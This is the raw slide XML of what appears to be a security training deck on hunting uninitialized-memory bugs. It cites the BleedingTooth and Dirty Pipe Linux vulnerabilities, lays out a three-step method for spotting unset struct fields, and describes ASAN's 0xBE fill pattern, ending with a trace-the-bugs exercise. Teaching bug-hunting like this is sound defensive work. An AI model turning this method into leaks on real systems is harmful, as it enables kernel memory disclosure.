              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Dirty Pipe forgot to do this…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7479DBE4-C9B3-9647-B6E8-CD16944FE3B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="749731" y="1148865"/>
            <a:ext cx="6439319" cy="461687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Mister Folk Distro - Other / Used">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3427A3-AEF2-7947-8D58-641539DE2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365" y="1708635"/>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679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6C7DE-5500-9841-AF51-98FA76B8520C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>BleedingTooth</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="https://google.github.io/security-research/pocs/linux/bleedingtooth/writeup.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BD7EFB6-528F-574B-9CCB-7BAB43F8058E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547820" y="1702196"/>
            <a:ext cx="5596180" cy="3317232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{964C4CAD-6110-694E-9138-A787FEE2DB38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4799951" y="3123735"/>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Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EE9703C-7BAF-C64F-BE03-864FB51317CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3890075" y="2718196"/>
            <a:ext cx="33837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Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED97FBBF-3118-4544-9F2B-D21BDEE7E432}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3890075" y="2718196"/>
            <a:ext cx="0" cy="193470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Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4056E2C-09B6-3445-9555-F44CF407ADA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3890074" y="4652901"/>
            <a:ext cx="33837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descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D2AB37F-14F4-B64F-83D9-4047A6DE73F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4799949" y="3685548"/>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192D82-8CB2-5B40-9310-00743835E8F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628649" y="1236541"/>
            <a:ext cx="3315669" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a2mp_info_rsp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sent back to user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only SOME of the fields set in error path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68B41058-3FF9-5E4E-B099-76267CACA500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="398754" y="2924010"/>
            <a:ext cx="3149065" cy="2148774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD782F5D-1D65-654C-B4D9-87A51B8AF611}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="398753" y="3626434"/>
            <a:ext cx="3149065" cy="13929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675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2AA4-E092-7146-BE5D-7A23E9619C57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629840" y="273847"/>
            <a:ext cx="8514159" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uninitialized Memory Vuln Hunt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A3923F-BA97-1FE9-061D-51B0BC66B386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629842" y="1260872"/>
            <a:ext cx="3868340" cy="617934"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uninitialized Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99200646-0A80-5348-A937-C3B987AFE004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629840" y="1809066"/>
            <a:ext cx="5476491" cy="2763441"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Identify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>creation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of a variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Find calls to pre-initialization (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>calloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, etc.) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If none, then continue to step 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Check that ALL fields are set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Uninitialized memory info leak">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90626663-9249-6343-976F-D725E2EBE00D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="374650" y="3531568"/>
            <a:ext cx="8394700" cy="1397000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F5AEEAD-9C68-E340-BC68-631DD540A01B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6335796" y="4928568"/>
            <a:ext cx="230450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091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4E7A-C9B6-EC4F-AF33-9CCA7ED9C1FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address Sanitizer (ASAN) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{163F111F-E99A-4546-8BB7-958752D01A6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detects MANY memory corruption bugs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>dynamically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack/heap overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use after frees</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initializes ALL memory to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>0xBE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easier to detect bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for this pattern</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="ASAN output from request - question marks indicate data that the terminal cannot render">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44F0E91C-F70E-5149-B369-3E2A735F5341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706833" y="1733627"/>
            <a:ext cx="3259367" cy="1676246"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Hexdump of the output 0xbebebebe">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E30729F1-B51A-7A41-930E-78998E590251}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3928545"/>
            <a:ext cx="6083300" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07F28304-2022-A147-A0AD-7E8D6F8D6A3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785965" y="4803543"/>
            <a:ext cx="129733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descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA9B5AB6-0376-6145-A09C-B9E1FA1E1014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935065" y="5071545"/>
            <a:ext cx="14600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Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0CE8102-B33C-2D44-88B0-274AC28AC390}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7271288" y="3409873"/>
            <a:ext cx="14600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821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2AA4-E092-7146-BE5D-7A23E9619C57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629840" y="273847"/>
            <a:ext cx="8514159" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your Turn to Trace Bugs!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A3923F-BA97-1FE9-061D-51B0BC66B386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629842" y="1260872"/>
            <a:ext cx="3868340" cy="617934"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uninitialized Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99200646-0A80-5348-A937-C3B987AFE004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629841" y="1809066"/>
            <a:ext cx="4562092" cy="2763441"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Identify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>creation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of a variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Find calls to pre-initialization (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>calloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, etc.) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>- If none, then continue to step 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Check that ALL fields are set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Uninitialized memory info leak">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90626663-9249-6343-976F-D725E2EBE00D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="374650" y="3531568"/>
            <a:ext cx="8394700" cy="1397000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DF4D4FE-D6C8-F74D-8806-C2A5606346D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
